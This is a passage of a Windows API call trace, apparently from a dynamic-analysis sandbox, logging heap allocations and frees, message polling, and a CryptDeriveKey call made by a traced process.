out: hHeap=0x970000) returned 1 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0175.159] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0175.159] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0175.160] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0175.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0175.160] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0175.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0175.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0175.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.161] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b48 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0175.161] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0175.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0175.162] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0175.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0175.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0175.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c38 [0175.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0175.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0175.164] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa873d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa874d0) returned 1 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0175.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0175.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0175.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0175.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0175.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0175.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0175.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0175.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0175.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0175.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0175.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0175.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0175.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0175.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0175.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0175.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0175.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0175.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0175.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0175.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0175.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0175.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0175.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0175.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0175.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0175.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0175.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0175.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0175.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0175.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0175.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0175.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0175.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0175.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0175.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0175.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0175.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0175.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0175.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0175.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0175.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0175.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0175.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0175.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0175.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0175.172] 